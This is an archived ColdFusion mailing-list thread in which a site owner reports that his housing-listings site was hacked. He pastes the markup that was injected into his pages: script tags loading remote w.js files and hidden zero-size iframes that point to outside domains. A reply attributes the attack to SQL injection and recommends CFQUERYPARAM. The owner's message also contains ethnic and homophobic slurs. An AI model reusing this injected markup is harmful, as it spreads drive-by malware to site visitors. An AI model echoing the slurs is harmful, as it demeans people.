sounds like a sql injection. make sure all you are using CFQUERYPARAM on your queries. The code is most likely coming from your database so it must not be completely clean yet if you're still seeing it on the page.
Tony wrote: > this is a URL you can view the code on > > http://www.salisburyhousing.com/viewListings.cfm?step=2&id=106 > > and dont worry, it will try to do something and break your browser and > install something but it doesnt do anything from what i can tell :) > you have been warned tho. > > -- tony > > Better than a thousand hollow words, is one word that brings peace. > -- siddhartha gautama > > > > On Tue, Sep 2, 2008 at 10:58 PM, Tony <[EMAIL PROTECTED]> wrote: > >> a site of mine has been hacked. >> they dropped a file in the www root of >> the site, and infected the database with >> bad data. ive cleand everything i can find >> in the data, its all gone... BUT when i view >> the pages... i get this in the code: >> >> <script src="http://jjmaobuduo.3322.org/csrss/w.js";> >> </script> >> <iframe width="0" scrolling="no" height="0" frameborder="0" >> src="http://count41.51yes.com/sa.aspx?id=419214144&refe=http%3A//www.salisburyhousing.com/listings.cfm%3Fshow%3Dstudent&location=http%3A//www.salisburyhousing.com/viewListings.cfm%3Fstep%3D2%26id%3D26&color=32x&resolution=1280x1024&returning=0&language=undefined&ua=Mozilla/5.0%20%28Windows%3B%20U%3B%20Windows%20NT%206.0%3B%20en-US%3B%20rv%3A1.8.1.16%29%20Gecko/20080702%20Firefox/2.0.0.16"; >> vspace="0" hspace="0" marginheight="0" marginwidth="0"> >> </iframe> >> <iframe width="0" height="0" src="http://www0.douhunqn.cn/csrss/new.htm";> >> </iframe> >> <script src="http://jjmaoduo.3322.org/csrss/w.js";> >> >> under any of the property images. trouble is i cant find this shit >> anywhere. ANYWAY >> seems that some CHINESE FUCKS at http://www.51yes.com are sending FAGGOT FUCK >> faces out to infect our shit, then get traffic from it... and i guess >> somehow make money from >> it. anyway... anyone have any idea what the fuck i should do? >> >> sorry for the profanity, im so damn sick to my stomache. >> >> -- tony >> >> Better than a thousand hollow words, is one word that brings peace. >> -- siddhartha gautama >> >> > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Community/message.cfm/messageid:267541 Subscription: http://www.houseoffusion.com/groups/CF-Community/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.5
